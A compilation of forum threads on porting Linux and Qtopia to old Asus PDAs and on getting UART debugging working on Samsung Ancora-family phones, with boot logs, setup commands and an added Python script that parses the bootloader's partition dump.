remove /lib/modules and replace with ours. the same is with /etc/modutils
That is all. just copy all files from 'kernel' dir to your pda and run haret.exe
I have a P525 with Windows Mobile 6, and after a lot of messing around and an unwanted hard reset I managed to make it work. I haven't checked everything yet, but as far as I can say, of the hardware keys only the number keys work.
I keep on having error about vfs root filesystem, any idea ???
how did you make it work? i'm working on windows pc, how do i proceed? or do i have to install linux... ubuntu perhaps?
guys what about port of android for other devices with pxa27x procesors?
Ok, a test build of qtopia for p525
copy haret.exe, default.txt and zImage to your wince pda
then, make an ext2 or reiserfs filesystem on one of sd card partitions. you can find manuals on using fdisk or gparted on the internet. e.g., your new partition is /dev/sde2
then,
mkfs.ext2 /dev/sde2
mkdir /mnt/asus
mount /dev/sde2 /mnt/asus
tar xvpf asus_qtopia.tar.bz2 -C /mnt/asus
cd /mnt/asus
sync
cd /
umount /mnt/asus
Then, edit your default.txt to point to your partition. Replace mmcblk0p2 with the partition name, like mmcblk0p3
At the moment you can only use menu, some qtopia apps, gsm calls do not work. Anyone willing to help me implement gsm calling? i can provide you with gsm logs from 525)).
Here are some screenshots
Ok, the brief status of the porting
Working in kernel
1. Framebuffer
2. Backlight
3. LEDs and vibro
4. Sound via pxa2xx-ac97 (still need to add sound profiles)
5. Keyboard - partly (only the part connected to pxa)
6. Touchscreen
7. max8588 voltage regulator
8. PCMCIA (not included)
9. SD Memory Card
10. pxa ficp - irda
11. USB partly. if enabled before booting linux
Todo
1. Bluetooth FW loader
2. i2c-connected keypad and joypad
3. Camera (looks like it's mt9m911)
4. Battery (dunno how it is connected)
5. Fix libertas to support our CF8385 B1
As for Qt Extended. GSM is not working. So it's the primary objective for now
If anyone who had the experience with porting qtopia to uni/freerunner/motorola wishes to join the project - you're welcome
http://depositfiles.com/ru/files/awz83fp34
Can't we just use an updated kernel? I mean, kernel 2.6.21 is a little old, and the latest (stable) kernel has bugfixes for the arm platform that 2.6.21 doesn't have.
The kernel in the archive with qtopia is 2.6.27-rc5
sp3dev
Please, can you upload somewhere your kernel config and mach- dir? I'm trying to make kernel for Rover S5 (aka Lenovo ET980), and your kernel is working good on this device (according to the fedora's boot logs), but with 1 major problem - display is not working
p.s. i'm talking about 2.6.21-hh20 kernel config, the new one isn't working
Need help for Asus P565
Hi,
I am on Asus P565 which carries...
Processor - Marvell PXA930
RAM - 128 MB
ROM - 256 MB
Camera - 3.2MP
Inbuilt GPS - SiRF Star III
Can someone share mtype for this phone or guide me to find it by using haret.
Thanks in advance...

Establishing a UART connection to the Ancora

As some of us here know, there are 3 ancora devices that are 100% known: The SGW, the Exhibit 2 and the Rugby Smart. For the last few weeks, I've been trying to establish a UART connection to the Rugby, being met with little to no success. (For those watching on G+, you've been privy to the information).
I know this is possible, since my TWRP image (using an arco68 based 2.6.35.14) for the Rugby can echo a kmsg to a serial monitor, but I haven't got 3.0.68 to do the same. So I'm calling in a global effort to get this cracked in the 3.0 kernel, that way we can deeper debug things.
What say the SGW and Exhibit 2 guys and gals?
Motorhead1991 said:
As some of us here know, there are 3 ancora devices that are 100% known: The SGW, the Exhibit 2 and the Rugby Smart. For the last few weeks, I've been trying to establish a UART connection to the Rugby, being met with little to no success. (For those watching on G+, you've been privy to the information).
I know this is possible, since my TWRP image (using an arco68 based 2.6.35.14) for the Rugby can echo a kmsg to a serial monitor, but I haven't got 3.0.68 to do the same. So I'm calling in a global effort to get this cracked in the 3.0 kernel, that way we can deeper debug things.
What say the SGW and Exhibit 2 guys and gals?
Are you really trying to "UART"? Because you have adb, it also works when the phone is turned off.
For a real UART, we need a module that enables a UART and makes Android a host.
adb kicks in too late for what I need, therefore I need to see what the SBL is doing with the kernel and whatnot via UART.
Motorhead1991 said:
adb kicks in too late for what I need, therefore I need to see what the SBL is doing with the kernel and whatnot via UART.
Maybe you need some hardware mods, because you need to be listening before Android starts, and the bootloader doesn't have specific code for that (I think).
Unless you could mod your bootloader, try a JTAG cable.
zezadas said:
Maybe you need some hardware mods, because you need to be listening before Android starts, and the bootloader doesn't have specific code for that (I think).
Unless you could mod your bootloader, try a JTAG cable.
As said in the OP, it works on 2.6.35.14 in recovery mode, just not 3.0.68 running the system. I don't even need the SBL log, as a kmsg would suffice.
What is UART?
Hi guys, What is UART?
I have googled it already for the meaning, but I can't seem to understand its purpose or benefits on our device..
PS. Please no negative Feedback, i'm just asking!!
[iop]wah said:
Hi guys, What is UART?
I have googled it already for the meaning, but I can't seem to understand its purpose or benefits on our device..
PS. Please no negative Feedback, i'm just asking!!
Using a UART connection on the ancora family (or any device) will help with kernel and filesystem debugging on boot, before adbd is even loaded, much less awake.
BTW, what do you want to do with UART, besides logging the bootloader?
Re: Establishing a UART connection to the Ancora
zezadas said:
BTW, what do you want to do with UART, besides logging the bootloader?
Obviously debugging.
Sent from my GT-I9001 using xda app-developers app
zezadas said:
BTW, what do you want to do with UART, besides logging the bootloader?
What XeLLaR* said... The Rugby 3.0 kernel is stuck without a camera because I have no idea what's killing the boot sequence. Initializing the cameras kills boot and it hangs on the second splash (ARIESVE.rle). I saw this with the a2220 chip also, which isn't something you guys have worked with (As far as I know).
Humm. Maybe you can post what you have reached until now. Maybe we can help.
Also, it is always an interesting thread for me.
Sent from my GT-I8150 using xda app-developers app
Motorhead1991 said:
What XeLLaR* said... The Rugby 3.0 kernel is stuck without a camera because I have no idea what's killing the boot sequence. Initializing the cameras kills boot and it hangs on the second splash (ARIESVE.rle). I saw this with the a2220 chip also, which isn't something you guys have worked with (As far as I know).
I don't know if it helps or not, but Jocala (he started working on cm9 for ancora_tmo) used to use the a2220: https://github.com/Jocala/kernel.ancora_tmo.ics/blob/master/include/linux/a2220.h
However when it got official support from arco, it disappeared: https://github.com/arco/samsung-kernel-msm7x30/commit/4669dbff4ad08a084b11eabe350b3b6adb2f317e
any news about this project?
zezadas said:
any news about this project?
Not anything new I'm afraid... I'm still trying to figure it out however.
about the uart, can you already log bootloader?
zezadas said:
about the uart, can you already log bootloader?
I haven't got a bootloader response yet, just a kmsg, and only on 2.6.
1 year later...
Any progress?
On I9001 I can log something via UART cable... if I hold:
Code:
Volume -
and
Power on
http://forum.xda-developers.com/showpost.php?p=52944982&postcount=29
Some problems, because different speed... not 100 % managed yet...
But need also solution for I8150 Logging...
Thanx in advance.
Best Regards
bump...
I have now I8150 in my hands...
If I hold Volume - then I can see something...
Maybe wrong speed or some wrong settings... but something is sent...
Maybe someone knows solution?
Thanx in advance.
Best Regards
adfree said:
bump...
I have now I8150 in my hands...
If I hold Volume - then I can see something...
Maybe wrong speed or some wrong settings... but something is sent...
Maybe someone knows solution?
Thanx in advance.
Best Regards
Hello adfree
Good to know you have a i8150 from this moment :good:
I couldn't understand your problem well, but if you want to enter download mode: hold the Volume - and Power keys
Also I think we must revive this thread, because it seems Mr. Blefish (who is maintaining Ideos X5) ported the lk bootloader to the Ideos X5 (so msm7x30/8x55)
Our devices (ancora and ariesve) are in the same family as the Ideos X5 (msm7x30/8x55)
Here is the initial work on lk bootloader for msm7x30/8x55 devices:
https://github.com/Blefish/android_bootable_bootloader_lk/compare/973308d69a...7d422c985a
If you are interested, let's start PMing
Regards
http://forum.xda-developers.com/showpost.php?p=52944982&postcount=29
My goal is to see something like this with I8150...
Code:
AST_POWERON
[1810] 0' Partition Information
[1810] dstatus = 0
[1810] dtype = 12
[1810] dfirstsec = 1
[1810] dsize = 212991
[1810] name = modem
size=5[1810] *********************************************************************
[1810] 1' Partition Information
[1810] dstatus = 128
[1810] dtype = 77
[1810] dfirstsec = 212992
[1810] dsize = 1000
[1810] name = dbl
size=3[1810] *********************************************************************
[1810] 2' Partition Information
[1810] dstatus = 0
[1810] dtype = 70
[1810] dfirstsec = 213992
[1810] dsize = 7192
[1810] name = osbl
size=4[1820] *********************************************************************
[1820] 3' Partition Information
[1820] dstatus = 0
[1820] dtype = 5
[1820] dfirstsec = 221184
[1820] dsize = 30883840
[1820] name =
size=0[1820] *********************************************************************
[1820] 4' Partition Information
[1820] dstatus = 0
[1830] dtype = 71
[1830] dfirstsec = 229376
[1830] dsize = 10240
[1830] name = emmcboot
size=8[1830] *********************************************************************
[1830] 5' Partition Information
[1830] dstatus = 0
[1830] dtype = 73
[1830] dfirstsec = 245760
[1830] dsize = 40000
[1830] name = amss
size=4[1830] *********************************************************************
[1840] 6' Partition Information
[1840] dstatus = 0
[1840] dtype = 88
[1840] dfirstsec = 286720
[1840] dsize = 6144
[1840] name =
size=0[1840] *********************************************************************
[1840] 7' Partition Information
[1840] dstatus = 0
[1840] dtype = 72
[1840] dfirstsec = 294912
[1850] dsize = 10240
[1850] name = boot
size=4[1850] *********************************************************************
[1850] 8' Partition Information
[1850] dstatus = 0
[1850] dtype = 80
[1850] dfirstsec = 311296
[1850] dsize = 14000
[1850] name = adsp
size=4[1850] *********************************************************************
[1860] 9' Partition Information
[1860] dstatus = 0
[1860] dtype = 74
[1860] dfirstsec = 327680
[1860] dsize = 6144
[1860] name = modem_st1
size=9[1860] *********************************************************************
[1860] 10' Partition Information
[1860] dstatus = 0
[1860] dtype = 75
[1860] dfirstsec = 335872
[1870] dsize = 6144
[1870] name = modem_st2
size=9[1870] *********************************************************************
[1870] 11' Partition Information
[1870] dstatus = 0
[1870] dtype = 144
[1870] dfirstsec = 344064
[1870] dsize = 16384
[1870] name = persist
size=7[1870] *********************************************************************
[1880] 12' Partition Information
[1880] dstatus = 0
[1880] dtype = 145
[1880] dfirstsec = 360448
[1880] dsize = 15360
[1880] name = recovery
size=8[1880] *********************************************************************
[1880] 13' Partition Information
[1880] dstatus = 0
[1880] dtype = 146
[1880] dfirstsec = 376832
[1880] dsize = 10240
[1890] name = parameter
size=9[1890] *********************************************************************
[1890] 14' Partition Information
[1890] dstatus = 0
[1890] dtype = 147
[1890] dfirstsec = 393216
[1890] dsize = 1064960
[1890] name = system
size=6[1890] *********************************************************************
[1900] 15' Partition Information
[1900] dstatus = 0
[1900] dtype = 148
[1900] dfirstsec = 1458176
[1900] dsize = 204800
[1900] name = cache
size=5[1900] *********************************************************************
[1900] 16' Partition Information
[1900] dstatus = 0
[1900] dtype = 149
[1900] dfirstsec = 1662976
[1900] dsize = 2826240
[1910] name = userdata
size=8[1910] *********************************************************************
[1910] 17' Partition Information
[1910] dstatus = 0
[1910] dtype = 150
[1910] dfirstsec = 4489216
[1910] dsize = 409600
[1910] name = preload
size=7[1910] *********************************************************************
[1910] 18' Partition Information
[1920] dstatus = 0
[1920] dtype = 151
[1920] dfirstsec = 4898816
[1920] dsize = 1000
[1920] name = dbl_backup
size=10[1920] *********************************************************************
[1920] 19' Partition Information
[1920] dstatus = 0
[1920] dtype = 152
[1920] dfirstsec = 4907008
[1920] dsize = 7192
[1930] name = osbl_backup
size=11[1930] *********************************************************************
[1930] 20' Partition Information
[1930] dstatus = 0
[1930] dtype = 153
[1930] dfirstsec = 4915200
[1930] dsize = 10240
[1930] name = emmcboot_backup
size=15[1930] *********************************************************************
[1940] 21' Partition Information
[1940] dstatus = 0
[1940] dtype = 154
[1940] dfirstsec = 4931584
[1940] dsize = 40000
[1940] name = amss_backup
size=11[1940] *********************************************************************
[1940] 22' Partition Information
[1940] dstatus = 0
[1940] dtype = 155
[1940] dfirstsec = 4972544
[1940] dsize = 10240
[1950] name = boot_backup
size=11[1950] *********************************************************************
[1950] 23' Partition Information
[1950] dstatus = 0
[1950] dtype = 156
[1950] dfirstsec = 4988928
[1950] dsize = 14000
[1950] name = adsp_backup
size=11[1950] *********************************************************************
[1960] 24' Partition Information
[1960] dstatus = 0
[1960] dtype = 157
[1960] dfirstsec = 5005312
[1960] dsize = 10240
[1960] name = recovery_backup
size=15[1960] *********************************************************************
[1960] 25' Partition Information
[1960] dstatus = 0
[1960] dtype = 158
[1960] dfirstsec = 5021696
[1970] dsize = 10240
[1970] name =
size=0[1970] *********************************************************************
[1970] 26' Partition Information
[1970] dstatus = 0
[1970] dtype = 159
[1970] dfirstsec = 5038080
[1970] dsize = 10240
[1970] name =
size=0[1970] *********************************************************************
[1970] 27' Partition Information
[1980] dstatus = 0
[1980] dtype = 160
[1980] dfirstsec = 5054464
[1980] dsize = 26050560
[1980] name =
size=0[1980] *********************************************************************
[1980] fsa_i2c_init ENTRY !!!
[2010] fsa_i2c_write done.
[2060] fsa_i2c_read done.
[2060] GPIO i2c init SUCCESS i2c_data : 1e
[2060] KEY_VOLUMEDOWN detected! start with no console mode.
[2060] charger_attached ENTRY !!!
[2190] dtype =0x0 dtype2=0x8 !!!
[2190] charger_attached check [[ 0 ]] !!!
[2190] boot_chg check [[ 0 ]] !!!
magic_key_offset : 2551183360
Load boot partition.
[2380] cmdline = 'console=ttyMSM2,115200 androidboot.hardware=qcom androidboot.emmc=true hw=7'
[2380]
Booting Linux
[2380] cmdline: console=ttyMSM2,115200 androidboot.hardware=qcom androidboot.emmc=true hw=7
[2380] Backlight off
[ 0.000000] Initializing cgroup subsys cpu
[ 0.000000] Linux version 2.6.35.7-1207170 ([email protected]) (gcc version 4.4.0 (GCC) ) #1 PREEMPT Tue Oct 30 12:33:11 KST 2012
[ 0.000000] CPU: ARMv7 Processor [511f00f2] revision 2 (ARMv7), cr=10c53c7d
[ 0.000000] CPU: VIPT nonaliasing data cache, VIVT ASID tagged instruction cache
[ 0.000000] Machine: GT-I9001 Board
[ 0.000000] AriesVE H/W revision : 0x07
[ 0.000000] Memory policy: ECC disabled, Data cache writeback
[ 0.000000] allocating 10772480 bytes at c10a4000 (14a4000 physical) for fb
[ 0.000000] allocating 2097152 bytes at c1aea000 (1eea000 physical) for audio pmem arena
[ 0.000000] allocating 6291456 bytes at c1d00000 (2100000 physical) for kernel ebi1 pmem arena
[ 0.000000] allocating 31457280 bytes at c7600000 (7a00000 physical) for sf pmem arena
[ 0.000000] allocating 30212096 bytes at c9400000 (9800000 physical) for adsp pmem arena
[ 0.000000] allocating 5242880 bytes at cb0d0000 (b4d0000 physical) for hdmi pmem arena
[ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 112136
[ 0.000000] Kernel command line: console=ttyMSM2,115200 androidboot.hardware=qcom androidboot.emmc=true hw=7
[ 0.000000] PID hash table entries: 2048 (order: 1, 8192 bytes)
[ 0.000000] Dentry cache hash table entries: 65536 (order: 6, 262144 bytes)
[ 0.000000] Inode-cache hash table entries: 32768 (order: 5, 131072 bytes)
[ 0.000000] Memory: 58MB 134MB 256MB = 448MB total
[ 0.000000] Memory: 359932k/359932k available, 98820k reserved, 0K highmem
[ 0.000000] Virtual kernel memory layout:
[ 0.000000] vector : 0xffff0000 - 0xffff1000 ( 4 kB)
[ 0.000000] fixmap : 0xfff00000 - 0xfffe0000 ( 896 kB)
<5>[ 0.000000] DMA : 0xff000000 - 0xffe00000 ( 14 MB)
[ 0.000000] vmalloc : 0xe0800000 - 0xf0000000 ( 248 MB)
[ 0.000000] lowmem : 0xc0000000 - 0xe0000000 ( 512 MB)
[ 0.000000] modules : 0xbf000000 - 0xc0000000 ( 16 MB)
[ 0.000000] .init : 0xc0008000 - 0xc0036000 ( 184 kB)
[ 0.000000] .text : 0xc0036000 - 0xc072f000 (7140 kB)
[ 0.000000] .data : 0xc075e000 - 0xc07dcc20 ( 508 kB)
[ 0.000000] Hierarchical RCU implementation.
[ 0.000000] RCU-based detection of stalled CPUs is disabled.
[ 0.000000] Verbose stalled-CPUs detection is disabled.
[ 0.000000] NR_IRQS:566
[ 0.000000] sched_clock: 32 bits at 32kHz, resolution 30517ns, wraps every 131071999ms
[ 0.000000] Console: colour dummy device 80x30
[ 0.000122] Calibrating delay loop... 933.88 BogoMIPS (lpj=4669440)
[ 0.250244] pid_max: default: 32768 minimum: 301
[ 0.250366] Mount-cache hash table entries: 512
[ 0.250579] Initializing cgroup subsys cpuacct
[ 0.250579] Initializing cgroup subsys freezer
[ 0.250610] CPU: Testing write buffer coherency: ok
[ 0.270660] NET: Registered protocol family 16
[ 0.290863] socinfo_init: v4, id=74, ver=2.1, raw_id=1402, raw_ver=1402, hw_plat=2, hw_plat_ver=65536
[ 0.290863] Clock ownership
[ 0.290893] GLBL : 07d82110
[ 0.290893] APPS : 00000000 00000000 00000000
[ 0.290893] ROW : 00000000 00000000
[ 0.291046] acpu_clock_init()
[ 0.291687] ACPU running at 1401600 KHz
[ 0.293090] msm_wlan_gpio_init: msm_wlan_gpio_init
[ 0.293182] msm7x30_init_mmc: Initialized wlan GPIO's
[ 0.294128] snddev_poweramp_gpio_init
[ 0.294158] aux_pcm_gpio_init
[ 0.294281] fsa9480_gpio_init
[ 0.294433] [TSP] M1 TSP LDO init
[ 0.300292] yda165:register yamaha amp device
[ 0.300292] si4709:register fm radio si4709 device
[ 0.300292] i2c_register_board_info 12
[ 0.300292] i2c_register_board_info 8
[ 0.300323] i2c_register_board_info 10
[ 0.300354] i2c_register_board_info 17
[ 0.300354] bt_power_init
[ 0.300354] bluetooth_gpio_init on system_rev:0
[ 0.300781] touch_keypad_gpio_init.
[ 0.300781] Boot Reason = 0x04
[ 0.300781] hw perfevents: enabled with ARMv7 Scorpion PMU driver, 5 counters available
[ 0.300903] Scorpion registered PMU device
[ 0.300964] pm8058_init: i2c_add_driver: rc = 0
[ 0.301330] pm8058_probe: PMIC revision: E3
[ 0.302734] pm8058_gpio_probe: gpiochip_add(): rc=0
[ 0.302917] pm8058_mpp_probe: gpiochip_add(): rc=0
[ 0.306365] bio: create slab <bio-0> at 0
[ 0.306610] pmic8058_pwm_probe: OK
[ 0.306854] SCSI subsystem initialized
[ 0.307006] usbcore: registered new interface driver usbfs
[ 0.307037] usbcore: registered new interface driver hub
[ 0.307128] usbcore: registered new device driver usb
[ 0.307281] i2c-gpio i2c-gpio.9: using pins 171 (SDA) and 170 (SCL)
[ 0.307342] i2c-gpio i2c-gpio.19: using pins 123 (SDA) and 122 (SCL)
[ 0.307403] i2c-gpio: probe of i2c-gpio.14 failed with error -16
[ 0.307464] i2c-gpio i2c-gpio.20: using pins 125 (SDA) and 124 (SCL)
[ 0.307556] i2c-gpio i2c-gpio.10: using pins 55 (SDA) and 89 (SCL)
[ 0.307617] i2c-gpio i2c-gpio.13: using pins 165 (SDA) and 164 (SCL)
[ 0.307708] i2c-gpio i2c-gpio.17: using pins 173 (SDA) and 172 (SCL)
[ 0.307800] i2c-gpio i2c-gpio.8: using pins 149 (SDA) and 148 (SCL)
[ 0.307861] i2c-gpio i2c-gpio.12: using pins 88 (SDA) and 86 (SCL)
[ 0.307952] i2c-gpio i2c-gpio.11: using pins 169 (SDA) and 168 (SCL)
[ 0.308013] msm_i2c_probe
[ 0.308074] msm_i2c_probe: clk_ctl 35d, 100000 Hz
[ 0.308349] msm_i2c_probe
[ 0.308410] msm_i2c_probe: clk_ctl 35d, 100000 Hz
[ 0.308807] Advanced Linux Sound Architecture Driver Version 1.0.23.
[ 0.360412] Bluetooth: Core ver 2.15
[ 0.360443] NET: Registered protocol family 31
[ 0.360473] Bluetooth: HCI device and connection manager initialized
[ 0.360473] Bluetooth: HCI socket layer initialized
[ 0.360534] Switching to clocksource gp_timer
[ 0.363250] NET: Registered protocol family 2
[ 0.380584] IP route cache hash table entries: 4096 (order: 2, 16384 bytes)
[ 0.460723] TCP established hash table entries: 16384 (order: 5, 131072 bytes)
[ 0.460906] TCP bind hash table entries: 16384 (order: 4, 65536 bytes)
[ 0.460998] TCP: Hash tables configured (established 16384 bind 16384)
[ 0.460998] TCP reno registered
[ 0.461029] UDP hash table entries: 256 (order: 0, 4096 bytes)
[ 0.461029] UDP-Lite hash table entries: 256 (order: 0, 4096 bytes)
[ 0.461120] NET: Registered protocol family 1
[ 0.461273] RPC: Registered udp transport module.
[ 0.461273] RPC: Registered tcp transport module.
[ 0.461273] RPC: Registered tcp NFSv4.1 backchannel transport module.
[ 0.461395] Trying to unpack rootfs image as initramfs...
[ 0.488372] Freeing initrd memory: 652K
<6>[ 0.488494] PMU: registered new PMU device of type 0
[ 0.488891] sdio_al:SDIO-AL SW version 1.30
[ 0.489135] smd probe
[ 0.489166] smd_core_init()
[ 0.489196] smd_core_init() done
[ 0.489196] smd_alloc_loopback_channel: 'local_loopback' cid=100
[ 0.489349] get_nand_partitions: no flash partition table in shared memory
[ 0.489776] smd_alloc_channel() 'DS' cid=0
[ 0.489837] smd_alloc_channel() 'RPCCALL' cid=2
[ 0.489868] smd_alloc_channel() 'DATA1' cid=7
[ 0.489929] smd_alloc_channel() 'DATA2' cid=8
[ 0.489959] smd_alloc_channel() 'DATA3' cid=9
[ 0.490020] smd_alloc_channel() 'DATA4' cid=10
[ 0.490051] smd_alloc_channel() 'DATA5' cid=11
[ 0.490081] smd_alloc_channel() 'DATA6' cid=12
[ 0.490112] smd_alloc_channel() 'DATA7' cid=13
[ 0.490173] smd_alloc_channel() 'DATA8' cid=14
[ 0.490203] smd_alloc_channel() 'DATA9' cid=15
[ 0.490264] smd_alloc_channel() 'DATA11' cid=17
[ 0.490295] smd_alloc_channel() 'DATA12' cid=18
[ 0.490325] smd_alloc_channel() 'DATA13' cid=19
[ 0.490356] smd_alloc_channel() 'DATA14' cid=20
[ 0.490417] smd_alloc_channel() 'DAL00' cid=38
[ 0.490447] smd_alloc_channel() 'BRG_0' cid=39
[ 0.490509] smd_alloc_channel() 'DATA5_CNTL' cid=40
[ 0.490539] smd_alloc_channel() 'DATA6_CNTL' cid=41
[ 0.490600] smd_alloc_channel() 'DATA7_CNTL' cid=42
[ 0.490631] smd_alloc_channel() 'DATA8_CNTL' cid=43
[ 0.490692] smd_alloc_channel() 'DATA9_CNTL' cid=44
[ 0.490753] smd_alloc_channel() 'DATA12_CNTL' cid=45
[ 0.490783] smd_alloc_channel() 'DATA13_CNTL' cid=46
[ 0.490814] smd_alloc_channel() 'DATA14_CNTL' cid=47
[ 0.490875] smd_alloc_channel() 'DATA40' cid=48
[ 0.490905] smd_alloc_channel() 'DATA40_CNTL' cid=49
[ 0.492126] SMD Packet Port Driver Initialized.
[ 0.492156] Notify: smsm init
[ 0.492309] Notify: general
[ 0.492340] Notify: general
[ 0.492340] Notify: general
[ 0.492340] Notify: general
[ 0.492340] Notify: general
[ 0.492340] Notify: general
[ 0.492340] Notify: general
[ 0.492340] Notify: general
[ 0.492340] Notify: general
[ 0.492370] Notify: general
[ 0.492370] Notify: general
[ 0.492614] SMD: ch 2 0 -> 1
[ 0.492828] [afe.c:afe_init] AFE driver init
[ 0.492950] SMD: ch 2 1 -> 2
[ 0.493194] [audpp.c:audpp_probe] Number of decoder supported 5
[ 0.493225] [audpp.c:audpp_probe] Number of concurrency supported 7
[ 0.493225] [audpp.c:audpp_probe] module_name:AUDPLAY4TASK
[ 0.493225] [audpp.c:audpp_probe] queueid:17
<6>[ 0.493225] [audpp.c:audpp_probe] decid:4
[ 0.493255] [audpp.c:audpp_probe] nr_codec_support:1
[ 0.493255] [audpp.c:audpp_probe] module_name:AUDPLAY3TASK
[ 0.493255] [audpp.c:audpp_probe] queueid:16
[ 0.493255] [audpp.c:audpp_probe] decid:3
[ 0.493255] [audpp.c:audpp_probe] nr_codec_support:11
[ 0.493286] [audpp.c:audpp_probe] module_name:AUDPLAY2TASK
[ 0.493286] [audpp.c:audpp_probe] queueid:15
[ 0.493286] [audpp.c:audpp_probe] decid:2
[ 0.493286] [audpp.c:audpp_probe] nr_codec_support:11
[ 0.493286] [audpp.c:audpp_probe] module_name:AUDPLAY1TASK
[ 0.493286] [audpp.c:audpp_probe] queueid:14
[ 0.493316] [audpp.c:audpp_probe] decid:1
[ 0.493316] [audpp.c:audpp_probe] nr_codec_support:11
[ 0.493316] [audpp.c:audpp_probe] module_name:AUDPLAY0TASK
[ 0.493316] [audpp.c:audpp_probe] queueid:13
<6>[ 0.493316] [audpp.c:audpp_probe] decid:0
Example from I9001...
Now Question how to set right settings for I8150...
LK sounds interesting... because I am playing with GT-S8600 here:
http://forum.xda-developers.com/showthread.php?t=2116846
Best Regards
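Added example (not part of the original posts): a Python parser for a bootloader partition dump in the format of the I9001 capture above. It checks the layout for overlaps and gaps and reads the console device and baud rate from the kernel command line the bootloader prints. The 512-byte sector size and all function names are assumptions, and the sample input is constructed from the first entries of that log.

```python
import re
from collections import namedtuple

SECTOR_BYTES = 512   # assumption: the log does not state the sector size
MBR_EXTENDED = 0x05  # standard MBR type byte for an extended-partition container

# Constructed sample in the format of the I9001 capture: entries 0-4, a
# deliberately truncated entry 5, then two later bootloader lines.
SAMPLE_LOG = """\
[1810] 0' Partition Information
[1810] dstatus = 0
[1810] dtype = 12
[1810] dfirstsec = 1
[1810] dsize = 212991
[1810] name = modem
size=5[1810] ********************
[1810] 1' Partition Information
[1810] dstatus = 128
[1810] dtype = 77
[1810] dfirstsec = 212992
[1810] dsize = 1000
[1810] name = dbl
size=3[1810] ********************
[1810] 2' Partition Information
[1810] dstatus = 0
[1810] dtype = 70
[1810] dfirstsec = 213992
[1810] dsize = 7192
[1810] name = osbl
size=4[1820] ********************
[1820] 3' Partition Information
[1820] dstatus = 0
[1820] dtype = 5
[1820] dfirstsec = 221184
[1820] dsize = 30883840
[1820] name =
size=0[1820] ********************
[1820] 4' Partition Information
[1820] dstatus = 0
[1830] dtype = 71
[1830] dfirstsec = 229376
[1830] dsize = 10240
[1830] name = emmcboot
size=8[1830] ********************
[1830] 5' Partition Information
[1830] dstatus = 0
[2190] dtype =0x0 dtype2=0x8 !!!
[2380] cmdline = 'console=ttyMSM2,115200 androidboot.hardware=qcom androidboot.emmc=true hw=7'
"""

Part = namedtuple("Part", "index dstatus dtype first size name")
HEADER = re.compile(r"\[\s*\d+\]\s*(\d+)'\s*Partition Information")
FIELD = re.compile(r"\[\s*\d+\]\s*(dstatus|dtype|dfirstsec|dsize|name)\s*=\s*(.*)$")
CONSOLE = re.compile(r"console=(\w+),(\d+)")

def parse_partitions(text):
    """Return the complete partition entries found in a captured UART log."""
    raw, cur = [], None
    for line in text.splitlines():
        if "****" in line:               # separator line closes the current entry
            cur = None
        elif (m := HEADER.search(line)):
            cur = {"index": m.group(1)}
            raw.append(cur)
        elif cur is not None and (m := FIELD.search(line)):
            cur[m.group(1)] = m.group(2).strip()
    keys = ("index", "dstatus", "dtype", "dfirstsec", "dsize")
    # Drop entries that serial noise or truncation left incomplete.
    good = [e for e in raw if all(e.get(k, "").isdigit() for k in keys)]
    return [Part(*(int(e[k]) for k in keys), e.get("name", "")) for e in good]

def check_layout(parts):
    """Report overlaps, gaps (in sectors) and entries past the extended container."""
    ext = next((p for p in parts if p.dtype == MBR_EXTENDED), None)
    rest = sorted((p for p in parts if p is not ext), key=lambda p: p.first)
    report = {"overlaps": [], "gaps": [], "outside_extended": []}
    for prev, cur in zip(rest, rest[1:]):
        delta = cur.first - (prev.first + prev.size)
        if delta < 0:
            report["overlaps"].append((prev.name, cur.name, -delta))
        elif delta > 0:
            report["gaps"].append((prev.name, cur.name, delta))
    if ext is not None:
        ext_end = ext.first + ext.size
        for p in rest:
            if p.first >= ext.first and p.first + p.size > ext_end:
                report["outside_extended"].append(p.name)
    return report

def console_settings(text):
    """Return (device, baud) from the first console= argument, or None."""
    m = CONSOLE.search(text)
    return (m.group(1), int(m.group(2))) if m else None

if __name__ == "__main__":
    parts = parse_partitions(SAMPLE_LOG)
    for p in parts:
        print(p.index, p.name or "-", p.size * SECTOR_BYTES // 1024, "KiB")
    print(check_layout(parts), console_settings(SAMPLE_LOG))
```

The `console=` value is what the bootloader passes to the kernel; whether the bootloader itself transmits at that rate is not stated in the thread.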

[Kernel] Has anyone got 3.4 kernel working? Kernel hackes are welcome.

I'm trying to get "soho" kernel (from 4.5.5) update to work on the device. With a bunch of fixes I compiled android_jem_defconfig, but as far as I got is
Code:
Uncompressing Linux... done, booting the kernel.
<6>Booting Linux on physical CPU 0
<6>Initializing cgroup subsys cpu
<5>Linux version 3.4.83-g237457e-dirty ([email protected]) (gcc version 4.6.x-google 20120106 (prerelease) (GCC) ) #17 SMP PREEMPT Sun Dec 20 16:15:48 EET 2015
CPU: ARMv7 Processor [412fc09a] revision 10 (ARMv7), cr=10c5387d
CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache
Machine: OMAP4 JEM board
[ 0.000000] Booting Linux on physical CPU 0
[ 0.000000] Initializing cgroup subsys cpu
[ 0.000000] Linux version 3.4.83-g237457e-dirty ([email protected]) (gcc version 4.6.x-google 20120106 (prerelease) (GCC) ) #17 SMP PREEMPT Sun Dec 20 16:15:48 EET 2015
[ 0.000000] CPU: ARMv7 Processor [412fc09a] revision 10 (ARMv7), cr=10c5387d
[ 0.000000] CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache
[ 0.000000] Machine: OMAP4 JEM board
<6>bootconsole [earlycon0] enabled
[ 0.000000] bootconsole [earlycon0] enabled
<6>Initialized persistent memory from a0000000-a01fffff
[ 0.000000] Initialized persistent memory from a0000000-a01fffff
<6>android_display: setting lcd resolution to 1920*1200, bpp=4
[ 0.000000] android_display: setting lcd resolution to 1920*1200, bpp=4
<6>android_display: tiler1d 50331648
[ 0.000000] android_display: tiler1d 50331648
<6>android_display: setting vram to 33554432
[ 0.000000] android_display: setting vram to 33554432
<3>Cannot detect omap type!
[ 0.000000] Cannot detect omap type!
<6>Reserving 33554432 bytes SDRAM for VRAM
[ 0.000000] Reserving 33554432 bytes SDRAM for VRAM
<6>cma: CMA: reserved 16 MiB at ab800000
[ 0.000000] cma: CMA: reserved 16 MiB at ab800000
Memory policy: ECC disabled, Data cache writealloc
[ 0.000000] Memory policy: ECC disabled, Data cache writealloc
